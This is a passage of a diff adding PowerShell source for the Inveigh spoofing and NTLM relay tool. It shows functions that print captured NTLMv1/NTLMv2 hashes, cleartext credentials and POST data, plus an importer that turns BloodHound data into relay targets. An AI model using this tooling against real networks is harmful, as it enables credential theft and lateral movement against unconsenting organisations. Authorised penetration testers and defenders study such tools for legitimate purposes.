+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output $unique_NTLMv1
+ }
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ }
+
+ if($NTLMv1Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
+
+ if($NTLMv2)
+ {
+ Write-Output $inveigh.NTLMv2_list
+ }
+
+ if($NTLMv2Unique)
+ {
+ $inveigh.NTLMv2_list.Sort()
+ $NTLMv2_list_temp = $inveigh.NTLMv2_list
+
+ foreach($unique_NTLMv2 in $NTLMv2_list_temp)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ }
+
+ if($NTLMv2Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
+
+ if($Cleartext)
+ {
+ Write-Output $inveigh.cleartext_list
+ }
+
+ if($CleartextUnique)
+ {
+ Write-Output $inveigh.cleartext_list | Get-Unique
+ }
+
+ if($POSTRequest)
+ {
+ Write-Output $inveigh.POST_request_list
+ }
+
+ if($POSTRequestUnique)
+ {
+ Write-Output $inveigh.POST_request_list | Get-Unique
+ }
+
+ if($Learning)
+ {
+ Write-Output $inveigh.valid_host_list
+ }
+
+ if($Session)
+ {
+ $sessions_temp = $inveigh.session
+ $i = 0
+
+ while($i -lt $inveigh.session_socket_table.Count)
+ {
+
+ if(!$inveigh.session_socket_table[$i].Connected)
+ {
+ $inveigh.session[$i] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ $i++
+ }
+
+ Write-Output $sessions_temp | Format-Table -AutoSize
+ }
+
+ if($Enumerate)
+ {
+ $enumerate_temp = $inveigh.enumerate
+ Write-Output $enumerate_temp
+ Remove-Variable enumerate_temp
+ }
+
+}
+
+function Watch-Inveigh
+{
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleOutput
+(Medium,Low) Medium and Low can be used to reduce output.
+#>
+
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][Switch]$NoConsoleMessage,
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium","Y")][String]$ConsoleOutput = "Y",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($inveigh.tool -ne 1)
+{
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+
+ if(!$NoConsoleMessage)
+ {
+ Write-Output "[*] Press any key to stop console output"
+ }
+
+ $inveigh.console_output = $true
+
+ :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+ else
+ {
+ Write-Output "[-] Inveigh isn't running"
+ }
+
+}
+else
+{
+ Write-Output "[-] Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
+
+function Clear-Inveigh
+{
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
+
+if($inveigh)
+{
+
+ if(!$inveigh.running -and !$inveigh.relay_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "[+] Inveigh data has been cleared from memory"
+ }
+ else
+ {
+ Write-Output "[-] Run Stop-Inveigh before running Clear-Inveigh"
+ }
+
+}
+
+}
+
+function ConvertTo-Inveigh
+{
+ <#
+ .SYNOPSIS
+ ConvertTo-Inveigh imports Bloodhound computers, groups and session JSON files into $inveigh.enumerate
+ for Inveigh Relay targeting.
+
+ .DESCRIPTION
+ For the fastest import, import the data before gather any enumeration data with Inveigh.
+
+ .PARAMETER BloodHoundComputersJSON
+ BloodHound computers file.
+
+ .PARAMETER BloodHoundSessionsJSON
+ BloodHound sessions file.
+
+ .PARAMETER BloodHoundGroupsJSON
+ BloodHound groups file.
+
+ .PARAMTER DNS
+ Enable DNS lookups
+ #>
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$Computers,
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$Sessions,
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$Groups,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+ )
+
+ if(!$Computers -and !$Sessions -and !$Groups)
+ {
+ Write-Output "Specifiy a BloodHound computers, groups, or sessions JSON file"
+ throw
+ }
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+ Write-Output "Run Stop-Inveigh before importing data with ConvertTo-Inveigh"
+ throw
+ }
+
+ if(!$inveigh)
+ {
+ $global:inveigh = [HashTable]::Synchronized(@{})
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.enumerate = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+ $inveigh.log = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_list = New-Object System.Collections.ArrayList
+ $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+ $inveigh.ADIDNS_table = [HashTable]::Synchronized(@{})
+ $inveigh.relay_failed_login_table = [HashTable]::Synchronized(@{})
+ $inveigh.relay_history_table = [HashTable]::Synchronized(@{})
+ $inveigh.request_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_socket_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.SMB_session_table = [HashTable]::Synchronized(@{})
+ $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{})
+ $inveigh.group_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_count = 0
+ $inveigh.session = @()
+ }
+
+ function New-RelayEnumObject
+ {
+ param ($IP,$Hostname,$DNSDomain,$netBIOSDomain,$Sessions,$AdministratorUsers,$AdministratorGroups,
+ $Privileged,$Shares,$NetSessions,$NetSessionsMapped,$LocalUsers,$SMB2,$Signing,$SMBServer,$DNSRecord,
+ $IPv6Only,$Targeted,$Enumerate,$Execute)
+
+ if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)}
+ if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)}
+ if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)}
+ if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)}
+ if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)}
+ if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)}
+ if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)}
+ if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)}
+
+ $relay_object = New-Object PSObject
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumerate.Count
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "DNS Domain" $DNSDomain
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "netBIOS Domain" $netBIOSDomain
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "DNS Record" $DNSRecord
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IPv6 Only" $IPv6Only
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumerate
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execute
+
+ return $relay_object
+ }
+
+ function Get-DNSEntry([String]$hostname)
+ {
+
+ try
+ {
+ $IP_list = [System.Net.Dns]::GetHostEntry($hostname)
+
+ foreach($entry in $IP_list.AddressList)
+ {
+
+ if(!$entry.IsIPv6LinkLocal)
+ {
+ $IP = $entry.IPAddressToString
+ }
+
+ }
+
+ }
+ catch
+ {
+ $IP = $null
+ }
+
+ return $IP
+ }
+
+ # JSON parsing from http://wahlnetwork.com/2016/03/15/deserializing-large-json-payloads-powershell-objects/
+ function Invoke-ParseItem($JSONItem)
+ {
+
+ if($JSONItem.PSObject.TypeNames -match 'Array')
+ {
+ return Invoke-ParseJsonArray($JSONItem)
+ }
+ elseif($JSONItem.PSObject.TypeNames -match 'Dictionary')
+ {
+ return Invoke-ParseJsonObject([HashTable]$JSONItem)
+ }
+ else
+ {
+ return $JSONItem
+ }
+
+ }
+
+ function Invoke-ParseJsonObject($JSONObject)
+ {
+ $result = New-Object -TypeName PSCustomObject
+
+ foreach($key in $JSONObject.Keys)
+ {
+ $item = $JSONObject[$key]
+
+ if ($item)
+ {
+ $parsed_item = Invoke-ParseItem $item
+ }
+ else
+ {
+ $parsed_item = $null
+ }
+
+ $result | Add-Member -MemberType NoteProperty -Name $key -Value $parsed_item
+ }
+
+ return $result
+ }
+
+ function Invoke-ParseJSONArray($JSONArray)
+ {
+ $result = @()
+ $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew()
+ $i = 0
+
+ $JSONArray | ForEach-Object -Process {
+
+ if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500)
+ {
+ $percent_complete_calculation = [Math]::Truncate($i / $JSONArray.count * 100)
+
+ if($percent_complete_calculation -le 100)
+ {
+ Write-Progress -Activity "Parsing JSON" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue
+ }
+
+ $stopwatch_progress.Reset()
+ $stopwatch_progress.Start()
+ }
+
+ $i++
+ $result += , (Invoke-ParseItem $_)}
+
+ return $result
+ }
+
+ function Invoke-ParseJSONString($json)
+ {
+ $config = $javaScriptSerializer.DeserializeObject($json)
+
+ return Invoke-ParseJsonObject $config
+ }
+
+ [void][System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
+
+ if($inveigh.enumerate.Count -eq 0)
+ {
+ $enumerate_empty = $true
+ }
+
+ if($Computers)
+ {
+ $Computers = (Resolve-Path $Computers).Path
+ $computers_serializer = New-Object -TypeName System.Web.Script.Serialization.JavaScriptSerializer
+ $computers_serializer.MaxJsonLength = 104857600
+ $bloodhound_computers = [System.IO.File]::ReadAllText($Computers)
+ $bloodhound_computers = $computers_serializer.DeserializeObject($bloodhound_computers)
+ Write-Output "[*] Parsing BloodHound Computers JSON"
+ $stopwatch_parse = [System.Diagnostics.Stopwatch]::StartNew()
+ $bloodhound_computers = Invoke-ParseItem $bloodhound_computers
+ Write-Output "[+] Parsing completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds"
+ $stopwatch_parse.Reset()
+ $stopwatch_parse.Start()
+ Write-Output "[*] Importing computers to Inveigh"
+ $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew()
+ $i = 0
+
+ if(!$bloodhound_computers.Computers)
+ {
+ Write-Output "[!] JSON computers parse failed"
+ throw
+ }
+
+ $bloodhound_computers.Computers | ForEach-Object {
+
+ if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500)
+ {
+ $percent_complete_calculation = [Math]::Truncate($i / $bloodhound_computers.Computers.Count * 100)
+
+ if($percent_complete_calculation -le 100)
+ {
+ Write-Progress -Activity "[*] Importing computers" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue
+ }
+
+ $stopwatch_progress.Reset()
+ $stopwatch_progress.Start()
+ }
+
+ $hostname = $_.Name
+ [Array]$local_admin_users = $_.LocalAdmins | Where-Object {$_.Type -eq 'User'} | Select-Object -expand Name
+ [Array]$local_admin_groups = $_.LocalAdmins | Where-Object {$_.Type -eq 'Group'} | Select-Object -expand Name
+
+ if($DNS)
+ {
+ $IP = Get-DNSEntry $hostname
+
+ if(!$IP)
+ {
+ Write-Output "[-] DNS lookup for $Hostname failed"
+ }
+
+ }
+
+ if(!$enumerate_empty)
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if(($hostname -and $inveigh.enumerate[$i].Hostname -eq $hostname) -or ($IP -and $inveigh.enumerate[$i].IP -eq $IP))
+ {
+
+ if($inveigh.enumerate[$i].Hostname -ne $hostname -and $inveigh.enumerate[$i].IP -eq $IP)
+ {
+
+ for($j = 0;$j -lt $inveigh.enumerate.Count;$j++)
+ {
+
+ if($inveigh.enumerate[$j].IP -eq $target)
+ {
+ $target_index = $j
+ break
+ }
+
+ }
+
+ $inveigh.enumerate[$target_index].Hostname = $hostname
+ }
+ else
+ {
+
+ for($j = 0;$j -lt $inveigh.enumerate.Count;$j++)
+ {
+
+ if($inveigh.enumerate[$j].Hostname -eq $hostname)
+ {
+ $target_index = $j
+ break
+ }
+
+ }
+
+ }
+
+ $inveigh.enumerate[$target_index]."Administrator Users" = $local_admin_users
+ $inveigh.enumerate[$target_index]."Administrator Groups" = $local_admin_groups
+ }
+ else
+ {
+ $inveigh.enumerate.Add((New-RelayEnumObject -Hostname $_.Name -IP $IP -AdministratorUsers $local_admin_users -AdministratorGroups $local_admin_groups)) > $null
+ }
+
+ }
+
+ }
+ else
+ {
+ $inveigh.enumerate.Add((New-RelayEnumObject -Hostname $_.Name -IP $IP -AdministratorUsers $local_admin_users -AdministratorGroups $local_admin_groups)) > $null
+ }
+
+ $IP = $null
+ $hostname = $null
+ $local_admin_users = $null
+ $local_admin_groups = $null
+ $target_index = $null
+ $i++
+ }
+
+ Write-Output "[+] Import completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds"
+ $stopwatch_parse.Reset()
+ Remove-Variable bloodhound_computers
+ }
+
+ if($Sessions)
+ {
+ $Sessions = (Resolve-Path $Sessions).Path
+ $sessions_serializer = New-Object -TypeName System.Web.Script.Serialization.JavaScriptSerializer
+ $sessions_serializer.MaxJsonLength = 104857600
+ $bloodhound_sessions = [System.IO.File]::ReadAllText($Sessions)
+ $bloodhound_sessions = $sessions_serializer.DeserializeObject($bloodhound_sessions)
+ $stopwatch_parse = [System.Diagnostics.Stopwatch]::StartNew()
+ Write-Output "[*] Parsing BloodHound Sessions JSON"
+ $bloodhound_sessions = Invoke-ParseItem $bloodhound_sessions
+ Write-Output "[+] Parsing completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds"
+ $stopwatch_parse.Reset()
+ $stopwatch_parse.Start()
+ Write-Output "[*] Importing sessions to Inveigh"
+ $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew()
+ $i = 0
+
+ if(!$bloodhound_sessions.Sessions)
+ {
+ Write-Output "[!] JSON sessions parse failed"
+ throw
+ }
+
+ $bloodhound_sessions.Sessions | ForEach-Object {
+
+ if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500)
+ {
+ $percent_complete_calculation = [Math]::Truncate($i / $bloodhound_sessions.Sessions.Count * 100)
+
+ if($percent_complete_calculation -le 100)
+ {
+ Write-Progress -Activity "[*] Importing sessions" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue
+ }
+
+ $stopwatch_progress.Reset()
+ $stopwatch_progress.Start()
+ }
+
+ $hostname = $_.ComputerName
+
+ if($hostname -as [IPAddress] -as [Bool])
+ {
+ $IP = $hostname
+ $hostname = $null
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ }
+ else
+ {
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].Hostname -eq $hostname)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ if($DNS)
+ {
+ $IP = Get-DNSEntry $hostname
+
+ if(!$IP)
+ {
+ Write-Output "[-] DNS lookup for $Hostname failed or IPv6 address"
+ }
+
+ }
+
+ }
+
+ if(!$enumerate_empty -or $target_index -ge 0)
+ {
+ [Array]$session_list = $inveigh.enumerate[$target_index].Sessions
+
+ if($session_list -notcontains $_.UserName)
+ {
+ $session_list += $_.UserName
+ $inveigh.enumerate[$target_index].Sessions = $session_list
+ }
+
+ }
+ else
+ {
+ $inveigh.enumerate.Add($(New-RelayEnumObject -Hostname $hostname -IP $IP -Sessions $_.UserName)) > $null
+ }
+
+ $hostname = $null
+ $IP = $null
+ $session_list = $null
+ $target_index = $null
+ $i++
+ }
+
+ Write-Output "[+] Import completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds"
+ $stopwatch_parse.Reset()
+ Remove-Variable bloodhound_sessions
+ }
+
+ if($Groups)
+ {
+ $Groups = (Resolve-Path $Groups).Path
+ $groups_serializer = New-Object -TypeName System.Web.Script.Serialization.JavaScriptSerializer
+ $groups_serializer.MaxJsonLength = 104857600
+ $bloodhound_groups = [System.IO.File]::ReadAllText($Groups)
+ $bloodhound_groups = $groups_serializer.DeserializeObject($bloodhound_groups)
+ $stopwatch_parse = [System.Diagnostics.Stopwatch]::StartNew()
+ Write-Output "[*] Parsing BloodHound Groups JSON"
+ $bloodhound_groups = Invoke-ParseItem $bloodhound_groups
+ Write-Output "[+] Parsing completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds"
+ $stopwatch_parse.Reset()
+ $stopwatch_parse.Start()
+ Write-Output "[*] Importing groups to Inveigh"
+ $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew()
+ $i = 0
+
+ if(!$bloodhound_groups.Groups)
+ {
+ Write-Output "[!] JSON groups parse failed"
+ throw
+ }
+
+ $bloodhound_groups.Groups | ForEach-Object {
+
+ if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500)
+ {
+ $percent_complete_calculation = [Math]::Truncate($i / $bloodhound_groups.Groups.Count * 100)
+
+ if($percent_complete_calculation -le 100)
+ {
+ Write-Progress -Activity "[*] Importing groups" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue
+ }
+
+ $stopwatch_progress.Reset()
+ $stopwatch_progress.Start()
+ }
+
+ [Array]$group_members = $_.Members | Select-Object -expand MemberName
+ $inveigh.group_table.Add($_.Name,$group_members)
+ $group_members = $null
+ $i++
+ }
+
+ Write-Output "[+] Import completed in $([Math]::Truncate($stopwatch.Elapsed.TotalSeconds)) seconds"
+ }
+
+}
+
+#endregion \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-29 20:12:51 +0000